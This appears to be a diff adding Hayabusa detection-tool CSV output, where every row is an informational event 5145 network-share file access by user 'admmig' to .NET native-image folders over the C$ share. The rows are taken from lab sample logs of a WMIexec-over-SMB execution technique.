+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
